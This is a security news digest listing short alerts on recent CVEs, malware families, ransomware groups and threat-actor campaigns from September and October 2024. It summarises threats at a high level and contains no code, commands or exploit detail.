27.10.24 | CVE-2024-43573 - Microsoft Windows MSHTML Platform spoofing vulnerability | ALERTS | VULNEREBILITY | CVE-2024-43573 is a spoofing vulnerability that has been recently disclosed as part of the October 2024 Patch Tuesday. The vulnerability is affecting Microsoft Windows MSHTML Platform. Assigned with the CVSS score of 6.5 (Moderate) the flaw might allow attackers to execute arbitrary code within the context of the vulnerable application. |
27.10.24 | New Pronsis Loader malware leveraged for Lumma Stealer and Latrodectus delivery | ALERTS | VIRUS | Pronsis Loader is a new malware variant leveraged recently in campaigns delivering Lumma Stealer and Latrodectus payloads. The malware utilizes executables compiled in JPHP programming language, which is a Java implementation of PHP. |
27.10.24 | LemonDuck: The evolving Multi-Platform cryptomining malware | ALERTS | VIRUS | LemonDuck, a well-known cryptomining malware, has evolved into a multi-platform threat and has been observed exploiting SMB vulnerabilities, particularly EternalBlue, as part of its attack vector to gain network access. |
27.10.24 | CVE-2024-7954 - Remote Code Execution vulnerability in SPIP Porte Plume Plugin | ALERTS | VULNEREBILITY | CVE-2024-7954 is a critical (CVSS score 9.8) Remote Code Execution (RCE) vulnerability in porte_plume plugin used by SPIP versions prior to 4.30-alpha2, 4.2.13, and 4.1.16. SPIP is free software content management system (CMS) for publishing websites |
27.10.24 | Lynx ransomware - a formidable cyber-extortion threat | ALERTS | RANSOM | A new research published by Palo Alto Networks Unit 42 indicates that the ransomware variant known as Lynx shares a significant portion of its source code with the INC ransomware. The threat operators of Lynx have actively targeted organizations in various sectors (architecture, real estate, retail, and financial/environmental services) in the U.S. and UK. This ransomware operates using a RaaS model, and is disseminated through a variety of attack vectors (deceptive phishing mails, malicious downloads to infect users systems, and hacking forums etc.). Once afflicted with Lynx ransomware the victim(s) data is exfiltrated before encryption following the double extortion approach to obtain a ransom payment. |
27.10.24 | CVE-2024-43572 - Microsoft Windows Management Console RCE vulnerability | ALERTS | VULNEREBILITY | CVE-2024-43572 is a Microsoft Windows Management Console remote code execution (RCE) vulnerability recently disclosed and patched as part of the October 2024 Patch Tuesday. The vulnerability is exploited through execution of specially crafted malicious Microsoft Saved Console (MSC) files. |
27.10.24 | Perfctl malware campaign exploiting RocketMQ vulnerability hits Linux Servers worldwide | ALERTS | VULNEREBILITY | A Perfctl malware campaign targeting millions of Linux servers worldwide has been observed. The campaign exploits the CVE-2023-33246 RocketMQ vulnerability. The malware employs rootkits for stealth and process masquerading along with TOR for command and control (C2) communication. As the final payload, it deploys a cryptominer alongside proxy hijacking software. Additionally, the malware utilizes temporary directories and modified system utilities to evade detection. |
27.10.24 | Kransom ransomware targets gamers by imitating Honkai: Star Rail installer | ALERTS | RANSOM | Reports indicate that Honkai: Star Rail, a popular role-playing game, is being exploited by a new ransomware dubbed Kransom. This ransomware spreads through drive-by-download campaigns, enticing victims by masquerading the malicious binary as a legitimate StarRail game installer and employing valid digital certificates. Upon execution, the malicious DLL is loaded using a dynamic-link library (DLL) side-loading technique, initiating the ransomware’s encryption process. |
27.10.24 | Havoc Framework | ALERTS | VIRUS | Researchers have found that cybercriminals are increasingly leveraging pen testing tools like the Havoc framework to evade security systems. This tool is less recognized than others, such as Cobalt Strike or Metasploit, which makes it harder to spot. The Mysterious Werewolf group is using strategies similar to the Mythic framework, and phishing emails that mimic legitimate organizations remain a common tactic for gaining unauthorized access. |
27.10.24 | CleanUpLoader Leveraged By Rhysida | ALERTS | VIRUS | A recent report shed light on a loader/backdoor known as "CleanUpLoader," used by the double-extortion ransomware actor "Rhysida" as an initial vector of infection. It is typically disguised as software installers like Microsoft Teams or Google Chrome. The loader facilitates communication with multiple command-and-control (C2) servers, allowing Rhysida to establish persistence and perform data exfiltration. |
27.10.24 | New Ivanti CSA vulnerabilities exploited in the wild | ALERTS | VULNEREBILITY | Ivanti has published a new security advisory regarding three recently disclosed Ivanti CSA (Cloud Services Application) vulnerabilities. The reported vulnerabilities are as follows. |
27.10.24 | Lua-based malware variants target the educational sector | ALERTS | VIRUS | There has been a recent surge in Lua-based malware targeting students, specifically targeted attacks capitalizing on popular games within the student gamer community who are searching for gaming cheats. Fake game cheats are being leveraged by threat actors to trick users into downloading this malware. |
27.10.24 | Horus Protector | ALERTS | VIRUS | A new malware distribution service has been uncovered called Horus Protector that claims to be a Fully Undetectable (FUD) crypter and distributes various malware families, including AgentTesla, Remcos, Snake, and NjRat. The service distributes malware using a .zip file that contains a VBE script and gathers information from users' machines to transmit to its server. |
27.10.24 | Threat actors associated with North Korea target tech job seekers with malware | ALERTS | APT | The Contagious Interview campaign started in 2023 and is perpetuated by threat actors associated with North Korea. Recent activity has been observed that can be tied to this campaign with threat actors posing as job recruiters and luring victims into supposed interviews. |
27.10.24 | A Recent PhantomLoader Campaign | ALERTS | VIRUS | PhantomLoader is a malware that disguises itself as a legitimate 32-bit DLL for a certain antivirus software and was recently found posing as “PatchUp.exe,” a genuine component of the software. The malicious loader was observed using binary patching and self-modifying techniques to load rust-based malware dubbed SSLoad into memory. |
27.10.24 | Malvertising campaign leads to malicious Windows and Mac payloads | ALERTS | VIRUS | A recently published report identified a campaign whereby advertisers are pushing ads for utility software, such as Slack or Notion, which lead to downloads of malicious payloads. The advertisers registered under existing businesses and distributed ads that target both Windows and Mac users. |
27.10.24 | Yunit Stealer - an infostealing malware with geofencing capabilities | ALERTS | VIRUS | Yunit Stealer is a malware variant recently distributed in the wild. Yunit has extensive infostealing capabilities including theft and exfiltration of credentials, credit card data, cryptocurrency wallets, cookies, auto-fill data and others. The collected information is exfiltrated via Discord or Telegram webhooks back to the attackers. |
27.10.24 | Vilsa Stealer | ALERTS | VIRUS | Vilsa Stealer is a new infostealer malware variant identified in the wild. The malware has the functionality to exfiltrate miscellaneous confidential data from the infected machine including: browser data, credentials, autofill data, cookies, banking information, cryptocurrency wallets, Discord tokens and Telegram data, among others. |
27.10.24 | Falcon Keylogger | ALERTS | VIRUS | Falcon is a keylogger variant recently active in the wild. Older samples of this malware date back even to 2019 while the latest observed are from just last month. Falcon has the functionality to record keystrokes on the infected machine, collect system information, screenshots, etc. The collected data is consecutively exfiltrated to the C2 servers controlled by the attackers. |
27.10.24 | Nunu Stealer malware | ALERTS | VIRUS | Nunu Stealer is a recently discovered Python-based infostealing malware variant which is based off an older Akira Stealer strain. The functionality includes exfiltration of various confidential information such as banking details, credit card data, credentials, autofill data stored in browsers, cookies, 3rd app session data, Discord tokens, cryptocurrency wallets and more. Nunu can be potentially used by attackers to compromise various user accounts and leverage those for further intrusions. |
27.10.24 | VeilShell: A new threat from North Korea's Vedalia APT group | ALERTS | APT | According to reports, threat actors linked to North Korea have been deploying a previously undocumented backdoor and remote access trojan (RAT) called VeilShell in a campaign targeting Southeast Asian countries. This activity is attributed to the Vedalia APT group (aka APT37, ScarCruft, Reaper) |
27.10.24 | SmartLoader Delivering Lumma Stealer | ALERTS | VIRUS | SmartLoader has been traced back to July 2024, involving a private GitHub account called "user-attachments." It starts with a zip archive containing four files: compiler.exe, conf.txt, Launcher.bat, and lua51.dll. The user runs Launcher.bat, which executes compiler.exe with conf.txt, triggering SmartLoader and deploying Lumma Stealer. |
27.10.24 | Key Group: Targeting Russian users with evolving ransomware | ALERTS | RANSOM | The Key Group is a financially motivated ransomware group that primarily targets Russian users and is known for negotiating with victims via Telegram. Like other groups that leverage leaked ransomware builders, Key Group predominantly utilizes the Chaos ransomware builder, among others, and operates a GitHub repository for its command and control (C2) infrastructure. |
27.10.24 | BabyLockerKZ - MedusaLocker Ransomware variant | ALERTS | RANSOM | BabyLockerKZ ransomware is a variant of MedusaLocker which has been active since 2023. This variant uses many of the same TTPs as seen in previous MedusaLocker attacks (publicly available tools, custom tools, lolbins, chat and leak sites). |
27.10.24 | Silver Oryx Blade - a new banking malware targeting Brazil | ALERTS | VIRUS | Silver Oryx Blade is a new banking trojan discovered by the researchers from Scitum. The malware prevalently targets victims from Brazil and attempts to steal banking information from the compromised machines. The infection chain is initiated via phishing emails leveraging financial or tax related lures. |
27.10.24 | Gorilla Botnet: A new global threat based on Mirai code | ALERTS | BOTNET | Reports indicate a surge in activity from a new botnet family called Gorilla Botnet, which is targeting telecommunications, universities, and the gaming industry worldwide. This botnet is a modified version of the Mirai source code and is compatible with various CPU architectures, including ARM, MIPS, x86_64, and x86. It boasts advanced DDoS attack methods and employs multiple techniques for persistence. |
27.10.24 | CeranaKeeper APT Campaign | ALERTS | APT | A recent CeranaKeeper APT campaign was observed by researchers. This China-linked threat actor targets government entities in Thailand, Myanmar, the Philippines, Japan, and Taiwan. The group continuously updates its tools, such as backdoors, to evade detection and exploits cloud services like Dropbox and OneDrive for custom solutions. |
27.10.24 | Fake Update Campaign Delivering WarmCookie Malware | ALERTS | CAMPAIGN | A new campaign in France is using compromised websites to distribute the WarmCookie backdoor through fake update prompts for popular applications like Google Chrome and Java. This tactic, employed by the threat group 'SocGolish', tricks users into downloading malicious software masquerading as legitimate updates for browsers and applications like Java and VMware. |
27.10.24 | Defi Ransomware | ALERTS | RANSOM | Defi is the newest malware variant from the Makop ransomware family. The malware encrypts user files and appends .defi1328 to them, alongside of a developers' email address and a victim's unique ID. The ransom note is dropped in form of text file called "README-WARNING.txt" within various on the disk. |
27.10.24 | Stonefly threat group continues to launch extortion attacks against US targets | ALERTS | GROUP | Symantec’s Threat Hunter Team has found evidence that the North Korean Stonefly group (aka Andariel, APT45, Silent Chollima, Onyx Sleet) is continuing to mount financially motivated attacks against organizations in the U.S., despite being the subject of an indictment and a multi-million dollar reward. |
27.10.24 | K4Spreader and Hadooken Latest Attacks | ALERTS | VULNEREBILITY | Recent research identified an infection chain targeting Windows and Linux systems through Oracle WebLogic vulnerabilities (CVE-2017-10271 and CVE-2020-14883). The attacker used Python and Bash scripts to deploy K4Spreader malware, which delivered the Tsunami backdoor and a cryptominer. |
27.10.24 | New Rast ransomware threat targets Chinese government entities | ALERTS | RANSOM | A new ransomware threat called Rast has been identified, specifically targeting Chinese government entities. The attack vector includes RDP brute-forcing and exploiting N-day vulnerabilities to gain access to border servers, followed by the manual deployment of ransomware components. |
27.10.24 | Active malware campaign targeting Russian energy companies and Electronics suppliers | ALERTS | CAMPAIGN | A new malware campaign targeting Russian energy companies and electronic component suppliers has been observed. The malware spreads through email attachments or Yandex Disk links, using RAR archives that contain LNK files to download and execute malicious HTA files. These files generate VBS scripts that ensure persistence via registry keys and scheduled tasks. |
27.10.24 | CVE-2024-43461 - Windows MSHTML Platform Spoofing vulnerability exploited in the wild | ALERTS | VULNEREBILITY | CVE-2024-43461 is a Windows MSHTML spoofing vulnerability recently disclosed as part of the September 2024 Patch Tuesday. Successful exploiting of this flaw might allow attackers to execute arbitrary code within the context of the application. This flaw has been reported as being exploited in zero-day attacks in conjunction with another MSHTML vulnerability from July - CVE-2024-38112. |
27.10.24 | North Korean hackers target Cryptocurrency users on LinkedIn with RustDoor malware | ALERTS | CRYPTOCURRENCY | In early September, the FBI warned of North Korean threat actors targeting the crypto industry. A campaign has been reported where these actors attempt to lure potential victims on LinkedIn to deliver RustDoor malware. One user was approached by someone impersonating a recruiter for a legitimate decentralized cryptocurrency exchange (DEX) technology firm, supported by professional-looking websites to enhance the legitimacy of the fake entities. |
27.10.24 | CVE-2024-6670 - Progress WhatsUp Gold SQL Injection vulnerability | ALERTS | VULNEREBILITY | CVE-2024-6670 is a recently disclosed SQL Injection vulnerability affecting Progress WhatsUp Gold, which is a well known network monitoring software. Successful exploitation of this flaw could allow an unauthenticated attacker to retrieve the user's encrypted passwords. The vulnerability has also been added to the "Known Exploited Vulnerabilities Catalog" by CISA, following reports of active exploitation in conjunction with another WhatsUp Gold vulnerability CVE-2024-6671. |
27.10.24 | Vulnerabilities in the Common UNIX Printing System (CUPS) | ALERTS | VULNEREBILITY | Symantec is aware of multiple vulnerabilities in the Common UNIX Printing System (CUPS) on UNIX-based systems, where an attacker could exploit certain configurations to gain unauthorized access and perform remote code execution (RCE), particularly by leveraging the cups-browsed service. |
27.10.24 | Advanced Rhadamanthys Infostealer: AI-Driven threats to Cryptocurrency security | ALERTS | VIRUS | A new version of Rhadamanthys Infostealer with advanced features including the use of artificial intelligence (AI) for optical character recognition (OCR) has been reported. |
27.10.24 | DCRat (aka Dark Crystal RAT) Trojan Malware | ALERTS | VIRUS | DCRat (aka Dark Crystal RAT) is a modular remote access Trojan available as malware-as-a-service since 2018. It can execute commands, log keystrokes, and exfiltrate data. Recently, it was delivered using HTML smuggling, which embeds and obfuscates the payload within HTML to evade security measures. |
28.9.24 | Wallet Scam: A Case Study in Crypto Drainer Tactics | HACKING | CRYPTOCURRENCY | Check Point Research (CPR) uncovered a malicious app on Google Play designed to steal cryptocurrency marking the first time a drainer has targeted mobile device users exclusively. The app used a set of evasion techniques to avoid detection and remained available for nearly five months before being removed. |
28.9.24 | CVE-2024-8190 - Ivanti Cloud Service Appliance Command Injection vulnerability | ALERTS | VULNEREBILITY | CVE-2024-8190 is a high severity (CVSS score 7.2) OS Command Injection vulnerability affecting Ivanti Cloud Services Appliance (CSA) versions 4.6 Patch 518 or older. If successfully exploited the flaw might allow a remote authenticated attacker for arbitrary code execution. |
28.9.24 | Vidar malware spreads via PEC Mail and Telegram profiles | ALERTS | VIRUS | CERT-AGID has identified a new campaign distributing Vidar through PEC mailboxes. The attackers are still leveraging Steam community profiles, but a significant new tactic involves exploiting Telegram profiles. In particular, the bios of these profiles are being used to reveal the IP addresses of their command and control (C2) servers. |
28.9.24 | Louse APT Group launches malware campaign targeting Chinese entities | ALERTS | APT | The Louse APT group (also known as Patchwork and Dropping Elephant) has reportedly launched a malware campaign targeting Chinese entities. The attack vector involves a malicious LNK file, likely originating from a phishing email. This file executes a PowerShell script that downloads a decoy PDF and a malicious DLL, which is loaded using DLL sideloading techniques. |
28.9.24 | CVE-2024-46908 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46907 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46906 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46905 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-46909 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
28.9.24 | CVE-2024-8785 | VULNEREBILITY | CVE | Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) working with Trend Micro Zero Day Initiative |
27.9.24 | Embargo | GROUP | RANSOMWARE | Embargo Ransomware Group Strikes DME Delivers in Cyber Attack |
27.9.24 | CVE-2024-47176 | VULNEREBILITY | CVE | cups-browsed <= 2.0.1 binds on UDP INADDR_ANY:631 trusting any packet from any source to trigger a Get-Printer-Attributes IPP request to an attacker-controlled URL |
27.9.24 | CVE-2024-47076 | VULNEREBILITY | CVE | libcupsfilters <= 2.1b1 cfGetPrinterAttributes5 does not validate or sanitize the IPP attributes returned from an IPP server, providing attacker-controlled data to the rest of the CUPS system |
27.9.24 | CVE-2024-47175 | VULNEREBILITY | CVE | libppd <= 2.1b1 ppdCreatePPDFromIPP2 does not validate or sanitize the IPP attributes when writing them to a temporary PPD file, allowing the injection of attacker-controlled data in the resulting PPD |
27.9.24 | CVE-2024-47177 | VULNEREBILITY | CVE | cups-filters <= 2.0.1 foomatic-rip allows arbitrary command execution via the FoomaticRIPCommandLine PPD parameter |
27.9.24 | DragonForce | GROUP | RANSOMWARE | Inside the Dragon: DragonForce Ransomware Group |
27.9.24 | DCRat | MALWARE | RAT | DCRat Targets Users with HTML Smuggling |
27.9.24 | CVE-2024-0132 | VULNEREBILITY | CVE | NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. |
27.9.24 | Hacking Kia | HACKING | CAR | Hacking Kia: Remotely Controlling Cars With Just a License Plate |
27.9.24 | FPSpy | MALWARE | BACKDOOR | Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy |
27.9.24 | KLogEXE | MALWARE | KEYLOGGER | Unraveling Sparkling Pisces’s Tool Set: KLogEXE and FPSpy |
27.9.24 | SilentSelfie | CAMPAIGN | CAMPAIGN | SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites |
27.9.24 | Malspam campaign targeting transportation industry | ALERTS | CAMPAIGN | Researchers have recently disclosed a malspam campaign targeting organizations in the transportation industry. The attack originates from compromised mail accounts and utilizes files with a .URL extension that is either attached to or linked within spam messages, if these URL files are opened the victims machine initiates an external SMB connection to download and run a remote malicious executable. |
27.9.24 | SloppyLemming: Phishing campaigns targeting South and East Asia organizations | ALERTS | CAMPAIGN | Reports indicate that a threat actor known as SloppyLemming has been actively targeting organizations in South and East Asia, particularly in Pakistan and Bangladesh. This actor employs open-source adversary emulation frameworks such as Cobalt Strike and Havoc. |
27.9.24 | New DragonForce ransomware variant targets Global Industries with LockBit and Conti modifications | ALERTS | RANSOM | New variants of DragonForce ransomware, featuring modified versions of LockBit and Conti, have been observed targeting the manufacturing, real estate, and transportation industries worldwide. DragonForce operates a Ransomware-as-a-Service affiliate program, offering various attack management tools. The group employs the SystemBC backdoor for persistence, along with Mimikatz and Cobalt Strike for credential harvesting and lateral movement. |
27.9.24 | Twelve attack group aims to destroy | ALERTS | HACKING | Established in 2023 in response to the Russian-Ukrainian conflict, the attack group known as Twelve has been observed targeting Russian government organizations. The group's tactics include file encryption via ransomware, file/system deletion via wipers, and exfiltration of sensitive data among others. Based on the analysis provided in a recently published report, the goal of the group is focused on destruction rather than financial gain. |
27.9.24 | New KLogExe and FPSpy | ALERTS | VIRUS | New keylogger malware KLogExe and backdoor variant FPSpy have been used by Sparkling Pisces (aka Kimsuky, THALLIUM, Velvet Chollima) threat group. This APT group is known for its sophisticated cyber-espionage operations and advanced spear phishing attacks. Sparkling Pisces lure victims into downloading and executing malicious payloads. This includes the use of new and undocumented malware. |
26.9.24 | BlackJack | GROUP | Hacktivist | BlackJack is a hacktivist group that emerged at the end of 2023, targeting companies based in Russia. In their Telegram channel, the group states that it aims to find vulnerabilities in the networks of Russian organizations and government institutions. |
26.9.24 | SloppyLemming | CAMPAIGN | Crypto | Unraveling SloppyLemming’s Operations Across South Asia |
26.9.24 | Salt Typhoon | CAMPAIGN | ISP | China's 'Salt Typhoon' Cooks Up Cyberattacks on US ISPs |
25.9.24 | Taliban Stealer | MALWARE | Stealer | Cyfirma researchers have discovered a website promoting a tool called 'Taliban Stealer'. Once executed, this stealer prompts the user to select what data to collect from the machine, such as passwords, cookies, or cryptocurrency wallets. |
25.9.24 | Rage Stealer | MALWARE | Stealer | A Comprehensive Analysis of Angry Stealer : Rage Stealer in a New Disguise |
25.9.24 | X-FILES Stealer | MALWARE | Stealer | X-FILES Stealer: Advanced malware with sophisticated features and ongoing enhancements |
25.9.24 | QWERTY Stealer | MALWARE | Stealer | QWERTY is a newly discovered infostealer variant observed being hosted on a Linux-based virtual private server located in Germany with limited service exposure. |
25.9.24 | et Another Silly Stealer (YASS) | MALWARE | Stealer | There's Something About CryptBot: Yet Another Silly Stealer (YASS) |
25.9.24 | POWERSHELL KEYLOGGER | MALWARE | Keylogger | At CYFIRMA, we are dedicated to delivering timely insights into emerging threats and malicious tactics that pose risks to both organizations and individuals. This report offers an analysis of a newly identified keylogger that operates via a PowerShell script. |
25.9.24 | Poseidon | MALWARE | Stealer | Poseidon Stealer Uses Sora AI Lure to Infect macOS |
25.9.24 | Luxy | MALWARE | Stealer | Luxy: A Stealer and a Ransomware in one |
25.9.24 | Gomorrah | MALWARE | Stealer | Gomorrah Stealer v5.1: An In-Depth Analysis of a .NET-Based Malware |
25.9.24 | Emansrepo | MALWARE | Stealer | In August 2024, FortiGuard Labs observed a python infostealer we call Emansrepo that is distributed via emails that include fake purchase orders and invoices. |
25.9.24 | BLX (aka XLABB) | MALWARE | Stealer | BLX Stealer known also as XLABB Stealer is a malware variant initially discovered back last year. New activity attributed to this infostealer has been observed in the wild. |
25.9.24 | RomCom RAT | MALWARE | RAT | Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware |
25.9.24 | HACKING | HTML | The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML, a technique called "ClickFix." The scripts led to an MSI file used to load DanaBot. | |
25.9.24 | Foxtrot Ransomware - a new MedusaLocker variant | ALERTS | RANSOM | Foxtrot is a latest ransomware variant from the MedusaLocker family. The malware encrypts user files and appends .foxtrot70 to them. The ransom note is dropped in form of a .html file called "How_to_back_files.html". Foxtrot comes with functionality to delete the volume shadow copies and Windows Backup on the infected machines. |
25.9.24 | PDiddySploit Trojan Malware | ALERTS | VIRUS | A recent research study has revealed that the scandal surrounding Sean 'Diddy' Combs, also known as P. Diddy, has been exploited. Attackers often capitalize on public interest in high-profile scandals to spread malware, taking advantage of the topic to trick unsuspecting users into downloading malicious files. |
25.9.24 | Turkey and Bulgaria Targeted in Remcos RAT Attacks | ALERTS | VIRUS | Symantec has recently observed two ongoing Remcos RAT campaigns from the same actor, targeting companies in Bulgaria and Turkey. In the Bulgarian campaign, they are using a classic invoice scheme (email subject: Плащане на фактура) to lure users, while in the Turkish campaign, they are using SWIFT transfer social engineering (email subject: Gelen Swift Mesaj). |
25.9.24 | Nanocore RAT Spreads Through Fake XLS Invoice | ALERTS | VIRUS | Nanocore RAT was highly prevalent many years ago and since has drastically dwindled but some groups and individuals continue to leverage this remote access trojan in their campaigns. One recent example being a fake invoice malspam campaign in which the authors have attached a malicious XLS (invoice.xls) that when executed will grab the Nanocore binary from a Discord server. |
25.9.24 | SnipBot - a new variant of the RomCom malware | ALERTS | VIRUS | Researchers from Palo Alto reported on a new variant of the RomCom malware dubbed SnipBot. The malware allows the attackers to execute command-line commands on the infected endpoints as well as to download additional arbitrary modules. |
25.9.24 | New Octo2 mobile malware variant observed in the wild | ALERTS | VIRUS | New variant of the Octo Android malware dubbed Octo2 has been identified in the wild. The malware has been spread via malicious campaigns targeting mobile users from European countries. |
25.9.24 | CVE-2024-0153 | VULNEREBILITY | CVE | Arm is aware of a number of security vulnerabilities in the Arm Mali GPU Kernel driver and their details are listed below. |
25.9.24 | Splinter | MALWARE | Tool Exploit | Discovering Splinter: A First Look at a New Post-Exploitation Red Team Tool |
25.9.24 | SpAIware | MALWARE | Spyware AI | Spyware Injection Into Your ChatGPT's Long-Term Memory (SpAIware) |
24.9.24 | Polyfill.io Supply Chain Attack | ATTACK | ATTACK | Over 100,000+ sites have been impacted by a supply chain attack involving the Polyfill.io service. Polyfill is a popular tool used for enhancing browser capabilities by hundreds of thousands of sites to ensure that all website visitors can use the same codebase for unsupported functionality. |
24.9.24 | Brain Cipher Ransomware Attack | ATTACK | ATTACK | A significant ransomware attack has struck Pusat Data Nasional (PDN), one of Indonesia’s government-owned national data centers. This incident involved threat actors encrypting government data, which disrupted digital services for immigration, airport checks, and several public services |
24.9.24 | SnakeKeylogger Attack | ATTACK | ATTACK | Threat actors are continuously preying on end users to unknowingly install a trojan stealer known as SnakeKeylogger or KrakenKeylogger. This trojan was developed using .NET and targets Windows users. |
24.9.24 | SectopRAT malware masqueraded as Notion installer in a recent distribution campaign | ALERTS | VIRUS | A new campaign spreading SectopRAT malware has been identified in the wild. The campaign disguises the malware binaries as installer files for known productivity software called Notion. The fake installers are distributed from malicious websites also masquerading as Notion software download portals. |
24.9.24 | Android Malware: Necro Trojan | ALERTS | VIRUS | The latest version of the Necro Trojan has infected various popular applications, including game mods available on Google Play, affecting over 11 million Android devices. This version employs obfuscation to evade detection and uses steganography to conceal its payloads. |
24.9.24 | Earth Baxia: Targeting Asia-Pacific region by exploiting GeoServer vulnerability | ALERTS | CAMPAIGN | According to a recent report from Trend Micro, the threat actor known as Earth Baxia has been targeting government, telecommunications, and energy organizations in the Asia-Pacific region through spear-phishing emails and the exploitation of the GeoServer vulnerability CVE-2024-36401. |
24.9.24 | SambaSpy malware targeting Italian users | ALERTS | VIRUS | SambaSpy RAT has been distributed in a new malicious campaign targeting users from Italy. The campaign has several stages within it's infection chain and is leveraging either malware downloaders or droppers depending on the observed run. |
24.9.24 | Go Injector Campaign Deploys Lumma Stealer | ALERTS | VIRUS | Researchers have identified a campaign using Go Injector to deploy Lumma Stealer, a malware designed to steal sensitive information. The attack begins when users visit a harmful website displaying a fake captcha, which tricks them into copying and running a command. This command downloads a zip file containing legitimate-looking files and the Go Injector. The injector then installs Lumma Stealer, which decrypts stolen data and sends it to the attackers. |
24.9.24 | Octo2 | MALWARE | Android | Octo2: European Banks Already Under Attack by New Malware Variant |
24.9.24 | Necro | MALWARE | TROJAN | How the Necro Trojan infiltrated Google Play, again |
23.9.24 | PondRAT | MALWARE | RAT | Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors |
23.9.24 | Earth Baxia | CAMPAIGN | PHISHING | Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC |
22.9.24 | CVE-2024-45694 | VULNEREBILITY | CVE | (9.8 critical): Stack-based buffer overflow, allowing unauthenticated remote attackers to execute arbitrary code on the device. |
22.9.24 | CVE-2024-45695 | VULNEREBILITY | CVE | (9.8 critical): Another stack-based buffer overflow allowing unauthenticated remote attackers to execute arbitrary code. |
22.9.24 | CVE-2024-45696 | VULNEREBILITY | CVE | (8.8 high): Attackers can forcibly enable the telnet service using hard-coded credentials within the local network. |
22.9.24 | CVE-2024-45697 | VULNEREBILITY | CVE | (9.8 critical): Telnet service is enabled when the WAN port is plugged in, allowing remote access with hard-coded credentials. |
22.9.24 | CVE-2024-45698 | VULNEREBILITY | CVE | (8.8 high): Improper input validation in the telnet service allows remote attackers to log in and execute OS commands with hard-coded credentials. |
22.9.24 | A stack-based overflow vulnerability exists in the Microchip Advanced Software Framework (ASF) implementation of the tinydhcp server | ALERT | ALERT | A stack-based overflow vulnerability exists in the tinydhcp server in the Microchip Advanced Software Framework (ASF) that can lead to remote code execution. |
22.9.24 | CVE-2024-8105 | VULNEREBILITY | CVE | A vulnerability related to the use an insecure Platform Key (PK) has been discovered. An attacker with the compromised PK private key can create malicious UEFI software that is signed with a trusted key that has been compromised. |
22.9.24 | CVE-2024-43461 | VULNEREBILITY | CVE | Windows MSHTML Platform Spoofing Vulnerability |
22.9.24 | Marko Polo | GROUP | GROUP | “Marko Polo” Navigates Uncharted Waters With Infostealer Empire |
21.9.24 | TWELVE | GROUP | GROUP | -=TWELVE=- is back |
20.9.24 | 2024-09-17 - Snake KeyLogger (VIP Recovery), FTP exfil | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
20.9.24 | 2024-09-16 - Snake KeyLogger (VIP Recovery), SMTP exfil | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
20.9.24 | North Korean APT group Appleworm delivers PondRAT via poisoned Python packages | ALERTS | APT | An ongoing campaign involving poisoned Python packages delivering backdoors for Linux and macOS, dubbed PondRAT, has been reported. This campaign is believed to be driven by the North Korean APT group Appleworm (also known as AppleJeus, Citrine Sleet, Gleaming Pisces). |
20.9.24 | New campaign targets GitHub users with Lumma Stealer malware via phishing emails | ALERTS | CAMPAIGN | CERT-AGID has reported a new campaign delivering Lumma Stealer malware. As part of this campaign, GitHub users are receiving alarming emails titled “IMPORTANT! Security Vulnerability Detected in Your Repository (Issue #1),” claiming to be from the “GitHub Security Team.” These emails warn recipients of a fabricated security vulnerability and encourage them to click on a suspicious link. |
20.9.24 | UNC1860 | APT | APT | UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks |
20.9.24 | Cracks in the Foundation | HACKING | Vulnerebility | Cracks in the Foundation: Intrusions of FOUNDATION Accounting Software |
20.9.24 | CVE-2024-8963 | VULNEREBILITY | CVE | Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963) |
19.9.24 | Vanilla Tempest | CAMPAIGN | Ransomware | Highway Blobbery: Data Theft using Azure Storage Explorer |
19.9.24 | Storm clouds | CAMPAIGN | CAMPAIGN | Storm clouds on the horizon: Resurgence of TeamTNT? |
19.9.24 | CVE-2024-45409 | VULNEREBILITY | CVE | The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. |
19.9.24 | Raptor Train | BOTNET | BOTNET | Derailing the Raptor Train |
19.9.24 | SambaSpy | MALWARE | RAT | Exotic SambaSpy is now dancing with Italian users |
18.9.24 | New variant of the Gomorrah Stealer identified in the wild | ALERTS | VIRUS | A new variant of the infostealing malware known as Gomorrah Stealer has been identified in the wild. Gomorrah is being offered for sale in form of a Malware-as-a-Service (MaaS) model. The malware is also actively developed by its creators who already announced upcoming 5.5 version of this infostealer to be released soon. |
18.9.24 | MISTPEN | MALWARE | Backdoor | An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader |
18.9.24 | CVE-2024-38812 | VULNEREBILITY | CVE | VMSA-2024-0019:VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) |
